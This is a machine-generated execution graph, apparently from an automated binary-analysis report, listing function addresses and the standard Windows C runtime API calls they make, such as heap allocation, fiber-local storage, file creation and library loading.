                                                                                                                                                                                                      execution_graph 18875 7ff7ff595480 18876 7ff7ff59548b 18875->18876 18884 7ff7ff59f314 18876->18884 18897 7ff7ff5a0348 EnterCriticalSection 18884->18897 20370 7ff7ff59f9fc 20371 7ff7ff59fbee 20370->20371 20373 7ff7ff59fa3e _isindst 20370->20373 20372 7ff7ff594f78 _set_fmode 11 API calls 20371->20372 20390 7ff7ff59fbde 20372->20390 20373->20371 20376 7ff7ff59fabe _isindst 20373->20376 20374 7ff7ff58c5c0 _log10_special 8 API calls 20375 7ff7ff59fc09 20374->20375 20391 7ff7ff5a6204 20376->20391 20381 7ff7ff59fc1a 20383 7ff7ff59a970 _isindst 17 API calls 20381->20383 20384 7ff7ff59fc2e 20383->20384 20388 7ff7ff59fb1b 20388->20390 20416 7ff7ff5a6248 20388->20416 20390->20374 20392 7ff7ff59fadc 20391->20392 20393 7ff7ff5a6213 20391->20393 20398 7ff7ff5a5608 20392->20398 20423 7ff7ff5a0348 EnterCriticalSection 20393->20423 20399 7ff7ff5a5611 20398->20399 20400 7ff7ff59faf1 20398->20400 20401 7ff7ff594f78 _set_fmode 11 API calls 20399->20401 20400->20381 20404 7ff7ff5a5638 20400->20404 20402 7ff7ff5a5616 20401->20402 20403 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20402->20403 20403->20400 20405 7ff7ff5a5641 20404->20405 20406 7ff7ff59fb02 20404->20406 20407 7ff7ff594f78 _set_fmode 11 API calls 20405->20407 20406->20381 20410 7ff7ff5a5668 20406->20410 20408 7ff7ff5a5646 20407->20408 20409 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20408->20409 20409->20406 20411 7ff7ff5a5671 20410->20411 20412 7ff7ff59fb13 20410->20412 20413 7ff7ff594f78 _set_fmode 11 API calls 20411->20413 20412->20381 20412->20388 20414 7ff7ff5a5676 20413->20414 20415 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20414->20415 20415->20412 20424 7ff7ff5a0348 EnterCriticalSection 20416->20424 18929 7ff7ff5a7c90 18932 7ff7ff5a2660 18929->18932 18933 7ff7ff5a26b2 18932->18933 18934 7ff7ff5a266d 18932->18934 18938 7ff7ff59b294 18934->18938 18939 7ff7ff59b2c0 FlsSetValue 18938->18939 18940 7ff7ff59b2a5 FlsGetValue 18938->18940 18941 7ff7ff59b2b2 18939->18941 18943 7ff7ff59b2cd 18939->18943 18940->18941 18942 7ff7ff59b2ba 18940->18942 18944 7ff7ff59b2b8 18941->18944 18945 7ff7ff59a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18941->18945 18942->18939 18946 7ff7ff59ec08 _set_fmode 11 API calls 18943->18946 18958 7ff7ff5a2334 18944->18958 18947 7ff7ff59b335 18945->18947 18948 7ff7ff59b2dc 18946->18948 18949 7ff7ff59b2fa FlsSetValue 18948->18949 18950 7ff7ff59b2ea FlsSetValue 18948->18950 18951 7ff7ff59b306 FlsSetValue 18949->18951 18952 7ff7ff59b318 18949->18952 18953 7ff7ff59b2f3 18950->18953 18951->18953 18955 7ff7ff59af64 _set_fmode 11 API calls 18952->18955 18954 7ff7ff59a9b8 __free_lconv_num 11 API calls 18953->18954 18954->18941 18956 7ff7ff59b320 18955->18956 18957 7ff7ff59a9b8 __free_lconv_num 11 API calls 18956->18957 18957->18944 18981 7ff7ff5a25a4 18958->18981 18960 7ff7ff5a2369 18996 7ff7ff5a2034 18960->18996 18963 7ff7ff5a2386 18963->18933 18964 7ff7ff59d66c _fread_nolock 12 API calls 18965 7ff7ff5a2397 18964->18965 18966 7ff7ff5a239f 18965->18966 18968 7ff7ff5a23ae 18965->18968 18967 7ff7ff59a9b8 __free_lconv_num 11 API calls 18966->18967 18967->18963 18968->18968 19003 7ff7ff5a26dc 18968->19003 18971 7ff7ff5a24aa 18972 7ff7ff594f78 _set_fmode 11 API calls 18971->18972 18974 7ff7ff5a24af 18972->18974 18973 7ff7ff5a2505 18976 7ff7ff5a256c 18973->18976 19014 7ff7ff5a1e64 18973->19014 18977 7ff7ff59a9b8 __free_lconv_num 11 API calls 18974->18977 18975 7ff7ff5a24c4 18975->18973 18978 7ff7ff59a9b8 __free_lconv_num 11 API calls 18975->18978 18980 7ff7ff59a9b8 __free_lconv_num 11 API calls 18976->18980 18977->18963 18978->18973 18980->18963 18982 7ff7ff5a25c7 18981->18982 18983 7ff7ff5a25d1 18982->18983 19029 7ff7ff5a0348 EnterCriticalSection 18982->19029 18987 7ff7ff5a2643 18983->18987 18988 7ff7ff59a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18983->18988 18987->18960 18990 7ff7ff5a265b 18988->18990 18991 7ff7ff5a26b2 18990->18991 18993 7ff7ff59b294 50 API calls 18990->18993 18991->18960 18994 7ff7ff5a269c 18993->18994 18995 7ff7ff5a2334 65 API calls 18994->18995 18995->18991 18997 7ff7ff594fbc 45 API calls 18996->18997 18998 7ff7ff5a2048 18997->18998 18999 7ff7ff5a2054 GetOEMCP 18998->18999 19000 7ff7ff5a2066 18998->19000 19001 7ff7ff5a207b 18999->19001 19000->19001 19002 7ff7ff5a206b GetACP 19000->19002 19001->18963 19001->18964 19002->19001 19004 7ff7ff5a2034 47 API calls 19003->19004 19005 7ff7ff5a2709 19004->19005 19007 7ff7ff5a2746 IsValidCodePage 19005->19007 19008 7ff7ff5a285f 19005->19008 19013 7ff7ff5a2760 __scrt_get_show_window_mode 19005->19013 19006 7ff7ff58c5c0 _log10_special 8 API calls 19009 7ff7ff5a24a1 19006->19009 19007->19008 19010 7ff7ff5a2757 19007->19010 19008->19006 19009->18971 19009->18975 19011 7ff7ff5a2786 GetCPInfo 19010->19011 19010->19013 19011->19008 19011->19013 19030 7ff7ff5a214c 19013->19030 19096 7ff7ff5a0348 EnterCriticalSection 19014->19096 19031 7ff7ff5a2189 GetCPInfo 19030->19031 19040 7ff7ff5a227f 19030->19040 19036 7ff7ff5a219c 19031->19036 19031->19040 19032 7ff7ff58c5c0 _log10_special 8 API calls 19033 7ff7ff5a231e 19032->19033 19033->19008 19034 7ff7ff5a2eb0 48 API calls 19035 7ff7ff5a2213 19034->19035 19041 7ff7ff5a7bf4 19035->19041 19036->19034 19039 7ff7ff5a7bf4 54 API calls 19039->19040 19040->19032 19042 7ff7ff594fbc 45 API calls 19041->19042 19043 7ff7ff5a7c19 19042->19043 19046 7ff7ff5a78c0 19043->19046 19047 7ff7ff5a7901 19046->19047 19048 7ff7ff59f910 _fread_nolock MultiByteToWideChar 19047->19048 19051 7ff7ff5a794b 19048->19051 19049 7ff7ff5a7bc9 19050 7ff7ff58c5c0 _log10_special 8 API calls 19049->19050 19052 7ff7ff5a2246 19050->19052 19051->19049 19053 7ff7ff59d66c _fread_nolock 12 API calls 19051->19053 19055 7ff7ff5a7983 19051->19055 19067 7ff7ff5a7a81 19051->19067 19052->19039 19053->19055 19054 7ff7ff59a9b8 __free_lconv_num 11 API calls 19054->19049 19056 7ff7ff59f910 _fread_nolock MultiByteToWideChar 19055->19056 19055->19067 19057 7ff7ff5a79f6 19056->19057 19057->19067 19077 7ff7ff59f154 19057->19077 19060 7ff7ff5a7a92 19062 7ff7ff59d66c _fread_nolock 12 API calls 19060->19062 19064 7ff7ff5a7b64 19060->19064 19066 7ff7ff5a7ab0 19060->19066 19061 7ff7ff5a7a41 19063 7ff7ff59f154 __crtLCMapStringW 6 API calls 19061->19063 19061->19067 19062->19066 19063->19067 19065 7ff7ff59a9b8 __free_lconv_num 11 API calls 19064->19065 19064->19067 19065->19067 19066->19067 19068 7ff7ff59f154 __crtLCMapStringW 6 API calls 19066->19068 19067->19049 19067->19054 19069 7ff7ff5a7b30 19068->19069 19069->19064 19070 7ff7ff5a7b50 19069->19070 19071 7ff7ff5a7b66 19069->19071 19072 7ff7ff5a0858 WideCharToMultiByte 19070->19072 19073 7ff7ff5a0858 WideCharToMultiByte 19071->19073 19074 7ff7ff5a7b5e 19072->19074 19073->19074 19074->19064 19075 7ff7ff5a7b7e 19074->19075 19075->19067 19076 7ff7ff59a9b8 __free_lconv_num 11 API calls 19075->19076 19076->19067 19083 7ff7ff59ed80 19077->19083 19081 7ff7ff59f203 LCMapStringW 19082 7ff7ff59f19a 19081->19082 19082->19060 19082->19061 19082->19067 19084 7ff7ff59eddd 19083->19084 19091 7ff7ff59edd8 __vcrt_FlsAlloc 19083->19091 19084->19082 19093 7ff7ff59f240 19084->19093 19085 7ff7ff59ee0d LoadLibraryExW 19087 7ff7ff59eee2 19085->19087 19088 7ff7ff59ee32 GetLastError 19085->19088 19086 7ff7ff59ef02 GetProcAddress 19086->19084 19090 7ff7ff59ef13 19086->19090 19087->19086 19089 7ff7ff59eef9 FreeLibrary 19087->19089 19088->19091 19089->19086 19090->19084 19091->19084 19091->19085 19091->19086 19092 7ff7ff59ee6c LoadLibraryExW 19091->19092 19092->19087 19092->19091 19094 7ff7ff59ed80 __crtLCMapStringW 5 API calls 19093->19094 19095 7ff7ff59f26e __crtLCMapStringW 19094->19095 19095->19081 19751 7ff7ff59c590 19762 7ff7ff5a0348 EnterCriticalSection 19751->19762 20438 7ff7ff5aadd9 20441 7ff7ff5954e8 LeaveCriticalSection 20438->20441 19106 7ff7ff5aae6e 19107 7ff7ff5aae87 19106->19107 19108 7ff7ff5aae7d 19106->19108 19110 7ff7ff5a03a8 LeaveCriticalSection 19108->19110 19115 7ff7ff59b040 19116 7ff7ff59b045 19115->19116 19120 7ff7ff59b05a 19115->19120 19121 7ff7ff59b060 19116->19121 19122 7ff7ff59b0a2 19121->19122 19123 7ff7ff59b0aa 19121->19123 19124 7ff7ff59a9b8 __free_lconv_num 11 API calls 19122->19124 19125 7ff7ff59a9b8 __free_lconv_num 11 API calls 19123->19125 19124->19123 19126 7ff7ff59b0b7 19125->19126 19127 7ff7ff59a9b8 __free_lconv_num 11 API calls 19126->19127 19128 7ff7ff59b0c4 19127->19128 19129 7ff7ff59a9b8 __free_lconv_num 11 API calls 19128->19129 19130 7ff7ff59b0d1 19129->19130 19131 7ff7ff59a9b8 __free_lconv_num 11 API calls 19130->19131 19132 7ff7ff59b0de 19131->19132 19133 7ff7ff59a9b8 __free_lconv_num 11 API calls 19132->19133 19134 7ff7ff59b0eb 19133->19134 19135 7ff7ff59a9b8 __free_lconv_num 11 API calls 19134->19135 19136 7ff7ff59b0f8 19135->19136 19137 7ff7ff59a9b8 __free_lconv_num 11 API calls 19136->19137 19138 7ff7ff59b105 19137->19138 19139 7ff7ff59a9b8 __free_lconv_num 11 API calls 19138->19139 19140 7ff7ff59b115 19139->19140 19141 7ff7ff59a9b8 __free_lconv_num 11 API calls 19140->19141 19142 7ff7ff59b125 19141->19142 19147 7ff7ff59af04 19142->19147 19161 7ff7ff5a0348 EnterCriticalSection 19147->19161 20516 7ff7ff599dc0 20519 7ff7ff599d3c 20516->20519 20526 7ff7ff5a0348 EnterCriticalSection 20519->20526 20530 7ff7ff58cbc0 20531 7ff7ff58cbd0 20530->20531 20547 7ff7ff599c18 20531->20547 20533 7ff7ff58cbdc 20553 7ff7ff58ceb8 20533->20553 20535 7ff7ff58cbf4 _RTC_Initialize 20545 7ff7ff58cc49 20535->20545 20558 7ff7ff58d068 20535->20558 20536 7ff7ff58d19c 7 API calls 20537 7ff7ff58cc75 20536->20537 20539 7ff7ff58cc09 20561 7ff7ff599084 20539->20561 20545->20536 20546 7ff7ff58cc65 20545->20546 20548 7ff7ff599c29 20547->20548 20549 7ff7ff599c31 20548->20549 20550 7ff7ff594f78 _set_fmode 11 API calls 20548->20550 20549->20533 20551 7ff7ff599c40 20550->20551 20552 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20551->20552 20552->20549 20554 7ff7ff58cec9 20553->20554 20557 7ff7ff58cece __scrt_acquire_startup_lock 20553->20557 20555 7ff7ff58d19c 7 API calls 20554->20555 20554->20557 20556 7ff7ff58cf42 20555->20556 20557->20535 20586 7ff7ff58d02c 20558->20586 20560 7ff7ff58d071 20560->20539 20562 7ff7ff5990a4 20561->20562 20563 7ff7ff58cc15 20561->20563 20564 7ff7ff5990c2 GetModuleFileNameW 20562->20564 20565 7ff7ff5990ac 20562->20565 20563->20545 20585 7ff7ff58d13c InitializeSListHead 20563->20585 20569 7ff7ff5990ed 20564->20569 20566 7ff7ff594f78 _set_fmode 11 API calls 20565->20566 20567 7ff7ff5990b1 20566->20567 20568 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20567->20568 20568->20563 20570 7ff7ff599024 11 API calls 20569->20570 20571 7ff7ff59912d 20570->20571 20572 7ff7ff599135 20571->20572 20577 7ff7ff59914d 20571->20577 20573 7ff7ff594f78 _set_fmode 11 API calls 20572->20573 20574 7ff7ff59913a 20573->20574 20575 7ff7ff59a9b8 __free_lconv_num 11 API calls 20574->20575 20575->20563 20576 7ff7ff59916f 20578 7ff7ff59a9b8 __free_lconv_num 11 API calls 20576->20578 20577->20576 20579 7ff7ff5991b4 20577->20579 20580 7ff7ff59919b 20577->20580 20578->20563 20582 7ff7ff59a9b8 __free_lconv_num 11 API calls 20579->20582 20581 7ff7ff59a9b8 __free_lconv_num 11 API calls 20580->20581 20583 7ff7ff5991a4 20581->20583 20582->20576 20584 7ff7ff59a9b8 __free_lconv_num 11 API calls 20583->20584 20584->20563 20587 7ff7ff58d046 20586->20587 20588 7ff7ff58d03f 20586->20588 20590 7ff7ff59a25c 20587->20590 20588->20560 20593 7ff7ff599e98 20590->20593 20600 7ff7ff5a0348 EnterCriticalSection 20593->20600 15937 7ff7ff58bb50 15938 7ff7ff58bb7e 15937->15938 15939 7ff7ff58bb65 15937->15939 15939->15938 15942 7ff7ff59d66c 15939->15942 15943 7ff7ff59d6b7 15942->15943 15948 7ff7ff59d67b _set_fmode 15942->15948 15952 7ff7ff594f78 15943->15952 15945 7ff7ff59d69e HeapAlloc 15946 7ff7ff58bbde 15945->15946 15945->15948 15948->15943 15948->15945 15949 7ff7ff5a3600 15948->15949 15955 7ff7ff5a3640 15949->15955 15961 7ff7ff59b338 GetLastError 15952->15961 15954 7ff7ff594f81 15954->15946 15960 7ff7ff5a0348 EnterCriticalSection 15955->15960 15962 7ff7ff59b379 FlsSetValue 15961->15962 15966 7ff7ff59b35c 15961->15966 15963 7ff7ff59b38b 15962->15963 15967 7ff7ff59b369 SetLastError 15962->15967 15978 7ff7ff59ec08 15963->15978 15966->15962 15966->15967 15967->15954 15968 7ff7ff59b39a 15969 7ff7ff59b3b8 FlsSetValue 15968->15969 15970 7ff7ff59b3a8 FlsSetValue 15968->15970 15972 7ff7ff59b3c4 FlsSetValue 15969->15972 15973 7ff7ff59b3d6 15969->15973 15971 7ff7ff59b3b1 15970->15971 15985 7ff7ff59a9b8 15971->15985 15972->15971 15991 7ff7ff59af64 15973->15991 15983 7ff7ff59ec19 _set_fmode 15978->15983 15979 7ff7ff59ec6a 15982 7ff7ff594f78 _set_fmode 10 API calls 15979->15982 15980 7ff7ff59ec4e HeapAlloc 15981 7ff7ff59ec68 15980->15981 15980->15983 15981->15968 15982->15981 15983->15979 15983->15980 15984 7ff7ff5a3600 _set_fmode 2 API calls 15983->15984 15984->15983 15986 7ff7ff59a9ec 15985->15986 15987 7ff7ff59a9bd RtlFreeHeap 15985->15987 15986->15967 15987->15986 15988 7ff7ff59a9d8 GetLastError 15987->15988 15989 7ff7ff59a9e5 __free_lconv_num 15988->15989 15990 7ff7ff594f78 _set_fmode 9 API calls 15989->15990 15990->15986 15996 7ff7ff59ae3c 15991->15996 16008 7ff7ff5a0348 EnterCriticalSection 15996->16008 16010 7ff7ff5999d1 16022 7ff7ff59a448 16010->16022 16027 7ff7ff59b1c0 GetLastError 16022->16027 16028 7ff7ff59b201 FlsSetValue 16027->16028 16029 7ff7ff59b1e4 FlsGetValue 16027->16029 16030 7ff7ff59b213 16028->16030 16031 7ff7ff59b1f1 16028->16031 16029->16031 16032 7ff7ff59b1fb 16029->16032 16034 7ff7ff59ec08 _set_fmode 11 API calls 16030->16034 16033 7ff7ff59b26d SetLastError 16031->16033 16032->16028 16036 7ff7ff59a451 16033->16036 16037 7ff7ff59b28d 16033->16037 16035 7ff7ff59b222 16034->16035 16039 7ff7ff59b240 FlsSetValue 16035->16039 16040 7ff7ff59b230 FlsSetValue 16035->16040 16049 7ff7ff59a574 16036->16049 16038 7ff7ff59a574 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16037->16038 16041 7ff7ff59b292 16038->16041 16043 7ff7ff59b24c FlsSetValue 16039->16043 16044 7ff7ff59b25e 16039->16044 16042 7ff7ff59b239 16040->16042 16045 7ff7ff59a9b8 __free_lconv_num 11 API calls 16042->16045 16043->16042 16046 7ff7ff59af64 _set_fmode 11 API calls 16044->16046 16045->16031 16047 7ff7ff59b266 16046->16047 16048 7ff7ff59a9b8 __free_lconv_num 11 API calls 16047->16048 16048->16033 16058 7ff7ff5a36c0 16049->16058 16092 7ff7ff5a3678 16058->16092 16097 7ff7ff5a0348 EnterCriticalSection 16092->16097 19163 7ff7ff5aac53 19164 7ff7ff5aac63 19163->19164 19167 7ff7ff5954e8 LeaveCriticalSection 19164->19167 20286 7ff7ff5a1720 20297 7ff7ff5a7454 20286->20297 20298 7ff7ff5a7461 20297->20298 20299 7ff7ff59a9b8 __free_lconv_num 11 API calls 20298->20299 20300 7ff7ff5a747d 20298->20300 20299->20298 20301 7ff7ff59a9b8 __free_lconv_num 11 API calls 20300->20301 20302 7ff7ff5a1729 20300->20302 20301->20300 20303 7ff7ff5a0348 EnterCriticalSection 20302->20303 16162 7ff7ff595698 16163 7ff7ff5956cf 16162->16163 16164 7ff7ff5956b2 16162->16164 16163->16164 16166 7ff7ff5956e2 CreateFileW 16163->16166 16187 7ff7ff594f58 16164->16187 16167 7ff7ff595716 16166->16167 16168 7ff7ff59574c 16166->16168 16190 7ff7ff5957ec GetFileType 16167->16190 16216 7ff7ff595c74 16168->16216 16172 7ff7ff594f78 _set_fmode 11 API calls 16175 7ff7ff5956bf 16172->16175 16180 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16175->16180 16176 7ff7ff595741 CloseHandle 16181 7ff7ff5956ca 16176->16181 16177 7ff7ff59572b CloseHandle 16177->16181 16178 7ff7ff595780 16242 7ff7ff595a34 16178->16242 16179 7ff7ff595755 16237 7ff7ff594eec 16179->16237 16180->16181 16186 7ff7ff59575f 16186->16181 16188 7ff7ff59b338 _set_fmode 11 API calls 16187->16188 16189 7ff7ff594f61 16188->16189 16189->16172 16191 7ff7ff5958f7 16190->16191 16192 7ff7ff59583a 16190->16192 16194 7ff7ff5958ff 16191->16194 16195 7ff7ff595921 16191->16195 16193 7ff7ff595866 GetFileInformationByHandle 16192->16193 16196 7ff7ff595b70 21 API calls 16192->16196 16197 7ff7ff59588f 16193->16197 16198 7ff7ff595912 GetLastError 16193->16198 16194->16198 16199 7ff7ff595903 16194->16199 16200 7ff7ff595944 PeekNamedPipe 16195->16200 16214 7ff7ff5958e2 16195->16214 16205 7ff7ff595854 16196->16205 16201 7ff7ff595a34 51 API calls 16197->16201 16203 7ff7ff594eec _fread_nolock 11 API calls 16198->16203 16202 7ff7ff594f78 _set_fmode 11 API calls 16199->16202 16200->16214 16206 7ff7ff59589a 16201->16206 16202->16214 16203->16214 16204 7ff7ff58c5c0 _log10_special 8 API calls 16207 7ff7ff595724 16204->16207 16205->16193 16205->16214 16259 7ff7ff595994 16206->16259 16207->16176 16207->16177 16210 7ff7ff595994 10 API calls 16211 7ff7ff5958b9 16210->16211 16212 7ff7ff595994 10 API calls 16211->16212 16213 7ff7ff5958ca 16212->16213 16213->16214 16215 7ff7ff594f78 _set_fmode 11 API calls 16213->16215 16214->16204 16215->16214 16217 7ff7ff595caa 16216->16217 16218 7ff7ff594f78 _set_fmode 11 API calls 16217->16218 16236 7ff7ff595d42 __std_exception_destroy 16217->16236 16220 7ff7ff595cbc 16218->16220 16219 7ff7ff58c5c0 _log10_special 8 API calls 16221 7ff7ff595751 16219->16221 16222 7ff7ff594f78 _set_fmode 11 API calls 16220->16222 16221->16178 16221->16179 16223 7ff7ff595cc4 16222->16223 16266 7ff7ff597e78 16223->16266 16225 7ff7ff595cd9 16226 7ff7ff595ce1 16225->16226 16227 7ff7ff595ceb 16225->16227 16228 7ff7ff594f78 _set_fmode 11 API calls 16226->16228 16229 7ff7ff594f78 _set_fmode 11 API calls 16227->16229 16233 7ff7ff595ce6 16228->16233 16230 7ff7ff595cf0 16229->16230 16231 7ff7ff594f78 _set_fmode 11 API calls 16230->16231 16230->16236 16232 7ff7ff595cfa 16231->16232 16234 7ff7ff597e78 45 API calls 16232->16234 16235 7ff7ff595d34 GetDriveTypeW 16233->16235 16233->16236 16234->16233 16235->16236 16236->16219 16238 7ff7ff59b338 _set_fmode 11 API calls 16237->16238 16239 7ff7ff594ef9 __free_lconv_num 16238->16239 16240 7ff7ff59b338 _set_fmode 11 API calls 16239->16240 16241 7ff7ff594f1b 16240->16241 16241->16186 16244 7ff7ff595a5c 16242->16244 16243 7ff7ff59578d 16252 7ff7ff595b70 16243->16252 16244->16243 16360 7ff7ff59f794 16244->16360 16246 7ff7ff595af0 16246->16243 16247 7ff7ff59f794 51 API calls 16246->16247 16248 7ff7ff595b03 16247->16248 16248->16243 16249 7ff7ff59f794 51 API calls 16248->16249 16250 7ff7ff595b16 16249->16250 16250->16243 16251 7ff7ff59f794 51 API calls 16250->16251 16251->16243 16253 7ff7ff595b8a 16252->16253 16254 7ff7ff595bc1 16253->16254 16255 7ff7ff595b9a 16253->16255 16256 7ff7ff59f628 21 API calls 16254->16256 16257 7ff7ff594eec _fread_nolock 11 API calls 16255->16257 16258 7ff7ff595baa 16255->16258 16256->16258 16257->16258 16258->16186 16260 7ff7ff5959b0 16259->16260 16261 7ff7ff5959bd FileTimeToSystemTime 16259->16261 16260->16261 16263 7ff7ff5959b8 16260->16263 16262 7ff7ff5959d1 SystemTimeToTzSpecificLocalTime 16261->16262 16261->16263 16262->16263 16264 7ff7ff58c5c0 _log10_special 8 API calls 16263->16264 16265 7ff7ff5958a9 16264->16265 16265->16210 16267 7ff7ff597f02 16266->16267 16268 7ff7ff597e94 16266->16268 16303 7ff7ff5a0830 16267->16303 16268->16267 16270 7ff7ff597e99 16268->16270 16271 7ff7ff597eb1 16270->16271 16272 7ff7ff597ece 16270->16272 16278 7ff7ff597c48 GetFullPathNameW 16271->16278 16286 7ff7ff597cbc GetFullPathNameW 16272->16286 16277 7ff7ff597ec6 __std_exception_destroy 16277->16225 16279 7ff7ff597c6e GetLastError 16278->16279 16281 7ff7ff597c84 16278->16281 16280 7ff7ff594eec _fread_nolock 11 API calls 16279->16280 16283 7ff7ff597c7b 16280->16283 16282 7ff7ff597c80 16281->16282 16285 7ff7ff594f78 _set_fmode 11 API calls 16281->16285 16282->16277 16284 7ff7ff594f78 _set_fmode 11 API calls 16283->16284 16284->16282 16285->16282 16287 7ff7ff597cef GetLastError 16286->16287 16291 7ff7ff597d05 __std_exception_destroy 16286->16291 16288 7ff7ff594eec _fread_nolock 11 API calls 16287->16288 16289 7ff7ff597cfc 16288->16289 16290 7ff7ff594f78 _set_fmode 11 API calls 16289->16290 16292 7ff7ff597d01 16290->16292 16291->16292 16293 7ff7ff597d5f GetFullPathNameW 16291->16293 16294 7ff7ff597d94 16292->16294 16293->16287 16293->16292 16295 7ff7ff597e08 memcpy_s 16294->16295 16296 7ff7ff597dbd __scrt_get_show_window_mode 16294->16296 16295->16277 16296->16295 16297 7ff7ff597df1 16296->16297 16300 7ff7ff597e2a 16296->16300 16298 7ff7ff594f78 _set_fmode 11 API calls 16297->16298 16302 7ff7ff597df6 16298->16302 16299 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16299->16295 16300->16295 16301 7ff7ff594f78 _set_fmode 11 API calls 16300->16301 16301->16302 16302->16299 16306 7ff7ff5a0640 16303->16306 16307 7ff7ff5a0682 16306->16307 16308 7ff7ff5a066b 16306->16308 16310 7ff7ff5a0686 16307->16310 16311 7ff7ff5a06a7 16307->16311 16309 7ff7ff594f78 _set_fmode 11 API calls 16308->16309 16313 7ff7ff5a0670 16309->16313 16332 7ff7ff5a07ac 16310->16332 16344 7ff7ff59f628 16311->16344 16317 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16313->16317 16315 7ff7ff5a06ac 16321 7ff7ff5a0751 16315->16321 16327 7ff7ff5a06d3 16315->16327 16331 7ff7ff5a067b __std_exception_destroy 16317->16331 16318 7ff7ff5a068f 16319 7ff7ff594f58 _fread_nolock 11 API calls 16318->16319 16320 7ff7ff5a0694 16319->16320 16323 7ff7ff594f78 _set_fmode 11 API calls 16320->16323 16321->16308 16324 7ff7ff5a0759 16321->16324 16322 7ff7ff58c5c0 _log10_special 8 API calls 16325 7ff7ff5a07a1 16322->16325 16323->16313 16326 7ff7ff597c48 13 API calls 16324->16326 16325->16277 16326->16331 16328 7ff7ff597cbc 14 API calls 16327->16328 16329 7ff7ff5a0717 16328->16329 16330 7ff7ff597d94 37 API calls 16329->16330 16329->16331 16330->16331 16331->16322 16333 7ff7ff5a07f6 16332->16333 16334 7ff7ff5a07c6 16332->16334 16335 7ff7ff5a0801 GetDriveTypeW 16333->16335 16337 7ff7ff5a07e1 16333->16337 16336 7ff7ff594f58 _fread_nolock 11 API calls 16334->16336 16335->16337 16338 7ff7ff5a07cb 16336->16338 16339 7ff7ff58c5c0 _log10_special 8 API calls 16337->16339 16340 7ff7ff594f78 _set_fmode 11 API calls 16338->16340 16342 7ff7ff5a068b 16339->16342 16341 7ff7ff5a07d6 16340->16341 16343 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16341->16343 16342->16315 16342->16318 16343->16337 16358 7ff7ff5aa540 16344->16358 16347 7ff7ff59f675 16350 7ff7ff58c5c0 _log10_special 8 API calls 16347->16350 16348 7ff7ff59f69c 16349 7ff7ff59ec08 _set_fmode 11 API calls 16348->16349 16351 7ff7ff59f6ab 16349->16351 16352 7ff7ff59f709 16350->16352 16353 7ff7ff59f6c4 16351->16353 16354 7ff7ff59f6b5 GetCurrentDirectoryW 16351->16354 16352->16315 16356 7ff7ff594f78 _set_fmode 11 API calls 16353->16356 16354->16353 16355 7ff7ff59f6c9 16354->16355 16357 7ff7ff59a9b8 __free_lconv_num 11 API calls 16355->16357 16356->16355 16357->16347 16359 7ff7ff59f65e GetCurrentDirectoryW 16358->16359 16359->16347 16359->16348 16361 7ff7ff59f7a1 16360->16361 16362 7ff7ff59f7c5 16360->16362 16361->16362 16363 7ff7ff59f7a6 16361->16363 16364 7ff7ff59f7ff 16362->16364 16367 7ff7ff59f81e 16362->16367 16365 7ff7ff594f78 _set_fmode 11 API calls 16363->16365 16366 7ff7ff594f78 _set_fmode 11 API calls 16364->16366 16368 7ff7ff59f7ab 16365->16368 16369 7ff7ff59f804 16366->16369 16377 7ff7ff594fbc 16367->16377 16371 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16368->16371 16372 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 16369->16372 16373 7ff7ff59f7b6 16371->16373 16374 7ff7ff59f80f 16372->16374 16373->16246 16374->16246 16375 7ff7ff59f82b 16375->16374 16376 7ff7ff5a054c 51 API calls 16375->16376 16376->16375 16378 7ff7ff594fe0 16377->16378 16379 7ff7ff594fdb 16377->16379 16378->16379 16380 7ff7ff59b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16378->16380 16379->16375 16381 7ff7ff594ffb 16380->16381 16385 7ff7ff59d9f4 16381->16385 16386 7ff7ff59501e 16385->16386 16387 7ff7ff59da09 16385->16387 16389 7ff7ff59da60 16386->16389 16387->16386 16393 7ff7ff5a3374 16387->16393 16390 7ff7ff59da75 16389->16390 16392 7ff7ff59da88 16389->16392 16390->16392 16406 7ff7ff5a26c0 16390->16406 16392->16379 16394 7ff7ff59b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16393->16394 16395 7ff7ff5a3383 16394->16395 16396 7ff7ff5a33ce 16395->16396 16405 7ff7ff5a0348 EnterCriticalSection 16395->16405 16396->16386 16407 7ff7ff59b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16406->16407 16408 7ff7ff5a26c9 16407->16408 16409 7ff7ff58ccac 16430 7ff7ff58ce7c 16409->16430 16412 7ff7ff58cdf8 16584 7ff7ff58d19c IsProcessorFeaturePresent 16412->16584 16413 7ff7ff58ccc8 __scrt_acquire_startup_lock 16415 7ff7ff58ce02 16413->16415 16422 7ff7ff58cce6 __scrt_release_startup_lock 16413->16422 16416 7ff7ff58d19c 7 API calls 16415->16416 16418 7ff7ff58ce0d __FrameHandler3::FrameUnwindToEmptyState 16416->16418 16417 7ff7ff58cd0b 16419 7ff7ff58cd91 16436 7ff7ff58d2e4 16419->16436 16421 7ff7ff58cd96 16439 7ff7ff581000 16421->16439 16422->16417 16422->16419 16573 7ff7ff599b9c 16422->16573 16427 7ff7ff58cdb9 16427->16418 16580 7ff7ff58d000 16427->16580 16431 7ff7ff58ce84 16430->16431 16432 7ff7ff58ce90 __scrt_dllmain_crt_thread_attach 16431->16432 16433 7ff7ff58ccc0 16432->16433 16434 7ff7ff58ce9d 16432->16434 16433->16412 16433->16413 16434->16433 16591 7ff7ff58d8f8 16434->16591 16437 7ff7ff5aa540 __scrt_get_show_window_mode 16436->16437 16438 7ff7ff58d2fb GetStartupInfoW 16437->16438 16438->16421 16440 7ff7ff581009 16439->16440 16618 7ff7ff5954f4 16440->16618 16442 7ff7ff5837fb 16625 7ff7ff5836b0 16442->16625 16446 7ff7ff58c5c0 _log10_special 8 API calls 16448 7ff7ff583ca7 16446->16448 16578 7ff7ff58d328 GetModuleHandleW 16448->16578 16449 7ff7ff58383c 16785 7ff7ff581c80 